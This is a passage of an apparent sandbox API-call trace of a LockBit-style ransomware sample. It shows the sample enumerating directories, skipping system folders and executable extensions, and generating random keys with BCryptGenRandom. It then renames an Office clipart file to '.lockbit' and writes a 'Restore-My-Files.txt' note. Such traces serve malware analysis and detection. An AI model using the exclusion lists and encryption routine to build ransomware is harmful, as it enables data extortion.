ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 0 [0100.587] FindClose (in: hFindFile=0x55fe38 | out: hFindFile=0x55fe38) returned 1 [0100.587] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 0 [0100.587] FindClose (in: hFindFile=0x55fdf8 | out: hFindFile=0x55fdf8) returned 1 [0100.588] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5e23bf0, ftCreationTime.dwHighDateTime=0x1d5a92e, ftLastAccessTime.dwLowDateTime=0x3aa5f40, ftLastAccessTime.dwHighDateTime=0x1d57b8d, ftLastWriteTime.dwLowDateTime=0x3aa5f40, ftLastWriteTime.dwHighDateTime=0x1d57b8d, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="fbi-conflicts.exe", cAlternateFileName="FBI-CO~1.EXE")) returned 1 [0100.588] lstrcmpiW (lpString1=".", lpString2="fbi-conflicts.exe") returned -1 [0100.588] lstrcmpiW (lpString1="..", lpString2="fbi-conflicts.exe") returned -1 [0100.588] PathFindExtensionW (pszPath="fbi-conflicts.exe") returned=".exe" [0100.588] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0100.588] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0100.588] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0100.588] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b7c0090, ftCreationTime.dwHighDateTime=0x1d59402, ftLastAccessTime.dwLowDateTime=0xaf252920, ftLastAccessTime.dwHighDateTime=0x1d5e2af, ftLastWriteTime.dwLowDateTime=0xaf252920, ftLastWriteTime.dwHighDateTime=0x1d5e2af, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="smartftp.exe", cAlternateFileName="")) returned 1 [0100.588] lstrcmpiW (lpString1=".", lpString2="smartftp.exe") returned -1 [0100.588] lstrcmpiW (lpString1="..", lpString2="smartftp.exe") returned -1 [0100.588] PathFindExtensionW (pszPath="smartftp.exe") returned=".exe" [0100.588] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0100.588] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0100.588] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0100.588] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b7c0090, ftCreationTime.dwHighDateTime=0x1d59402, ftLastAccessTime.dwLowDateTime=0xaf252920, ftLastAccessTime.dwHighDateTime=0x1d5e2af, ftLastWriteTime.dwLowDateTime=0xaf252920, ftLastWriteTime.dwHighDateTime=0x1d5e2af, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="smartftp.exe", cAlternateFileName="")) returned 0 [0100.588] FindClose (in: hFindFile=0x55fdb8 | out: hFindFile=0x55fdb8) returned 1 [0100.588] FindNextFileW (in: hFindFile=0x55fd78, lpFindFileData=0x3d6e1c0 | out: lpFindFileData=0x3d6e1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbd6edc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd6edc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0100.588] lstrcmpiW (lpString1=".", lpString2="Microsoft Office") returned -1 [0100.588] lstrcmpiW (lpString1="..", lpString2="Microsoft Office") returned -1 [0100.588] lstrcmpiW (lpString1="Microsoft Office", lpString2="$windows.~bt") returned 1 [0100.588] lstrcmpiW (lpString1="Microsoft Office", lpString2="intel") returned 1 [0100.588] lstrcmpiW (lpString1="Microsoft Office", lpString2="msocache") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="$recycle.bin") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="$windows.~ws") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="tor browser") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="boot") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="system volume information") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="perflogs") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="google") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="application data") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="windows") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="windows.old") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="appdata") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="Windows nt") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="Msbuild") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="Microsoft") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="All users") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="mozilla") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="Microsoft.NET") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="microsoft shared") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="Internet Explorer") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="common files") returned 1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="opera") returned -1 [0100.589] lstrcmpiW (lpString1="Microsoft Office", lpString2="Windows Journal") returned -1 [0100.589] wsprintfW (in: param_1=0x3d6dda0, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office") returned 34 [0100.589] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\*") returned 36 [0100.589] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6d598, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6d598) returned 0x55fdb8 [0100.590] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0100.590] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbd6edc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd6edc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.590] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0100.590] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0100.590] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0100.590] lstrcmpiW (lpString1=".", lpString2="CLIPART") returned -1 [0100.590] lstrcmpiW (lpString1="..", lpString2="CLIPART") returned -1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="$windows.~bt") returned 1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="intel") returned -1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="msocache") returned -1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="$recycle.bin") returned 1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="$windows.~ws") returned 1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="tor browser") returned -1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="boot") returned 1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="system volume information") returned -1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="perflogs") returned -1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="google") returned -1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="application data") returned 1 [0100.590] lstrcmpiW (lpString1="CLIPART", lpString2="windows") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="windows.old") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="appdata") returned 1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="Windows nt") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="Msbuild") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="Microsoft") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="All users") returned 1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="mozilla") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="Microsoft.NET") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="microsoft shared") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="Internet Explorer") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="common files") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="opera") returned -1 [0100.591] lstrcmpiW (lpString1="CLIPART", lpString2="Windows Journal") returned -1 [0100.591] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART") returned 42 [0100.591] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\*") returned 44 [0100.591] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6c970, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6c970) returned 0x55fdf8 [0100.592] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0100.592] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.592] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0100.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0100.593] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB60COR", cAlternateFileName="")) returned 1 [0100.593] lstrcmpiW (lpString1=".", lpString2="PUB60COR") returned -1 [0100.593] lstrcmpiW (lpString1="..", lpString2="PUB60COR") returned -1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="$windows.~bt") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="intel") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="msocache") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="$recycle.bin") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="$windows.~ws") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="tor browser") returned -1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="boot") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="system volume information") returned -1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="perflogs") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="google") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="application data") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="windows") returned -1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="windows.old") returned -1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="appdata") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="Windows nt") returned -1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="Msbuild") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="Microsoft") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="All users") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="mozilla") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="Microsoft.NET") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="microsoft shared") returned 1 [0100.593] lstrcmpiW (lpString1="PUB60COR", lpString2="Internet Explorer") returned 1 [0100.594] lstrcmpiW (lpString1="PUB60COR", lpString2="common files") returned 1 [0100.594] lstrcmpiW (lpString1="PUB60COR", lpString2="opera") returned 1 [0100.594] lstrcmpiW (lpString1="PUB60COR", lpString2="Windows Journal") returned -1 [0100.594] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 51 [0100.594] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*") returned 53 [0100.594] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0100.597] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0100.597] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.598] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0100.598] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0100.598] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54952c00, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54952c00, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x2340, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00004_.GIF", cAlternateFileName="")) returned 1 [0100.598] lstrcmpiW (lpString1=".", lpString2="AG00004_.GIF") returned -1 [0100.598] lstrcmpiW (lpString1="..", lpString2="AG00004_.GIF") returned -1 [0100.598] PathFindExtensionW (pszPath="AG00004_.GIF") returned=".GIF" [0100.598] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.598] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.598] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.598] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.598] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.598] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.598] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.598] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.598] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.598] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.598] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.598] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.598] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.598] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.598] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.598] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.598] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.598] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.598] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.599] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.599] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.599] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.599] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.599] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.599] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.600] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.600] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.600] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00004_.GIF") returned 1 [0100.600] lstrcmpiW (lpString1="ntldr", lpString2="AG00004_.GIF") returned 1 [0100.600] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00004_.GIF") returned 1 [0100.600] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00004_.GIF") returned 1 [0100.600] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00004_.GIF") returned 1 [0100.600] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00004_.GIF") returned 1 [0100.600] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00004_.GIF") returned 1 [0100.600] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.600] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned=".GIF" [0100.600] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.600] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.600] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.600] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.600] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.600] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.600] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.600] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.600] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.600] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.600] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.600] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.601] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.601] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.601] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.601] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.601] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.601] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.lockbit") returned 72 [0100.601] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0100.604] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.604] malloc (_Size=0x40068) returned 0x1ff1e60 [0100.604] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9024) returned 1 [0100.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0100.608] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0100.612] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.639] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.639] malloc (_Size=0xa6) returned 0x77d800 [0100.639] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0100.680] free (_Block=0x77d800) [0100.680] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.680] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.680] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0100.683] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.683] malloc (_Size=0x40068) returned 0x1ff1e60 [0100.683] WriteFile (in: hFile=0x13e4, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0100.685] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83130700, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83130700, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x1c30, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00011_.GIF", cAlternateFileName="")) returned 1 [0100.685] lstrcmpiW (lpString1=".", lpString2="AG00011_.GIF") returned -1 [0100.685] lstrcmpiW (lpString1="..", lpString2="AG00011_.GIF") returned -1 [0100.685] PathFindExtensionW (pszPath="AG00011_.GIF") returned=".GIF" [0100.685] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 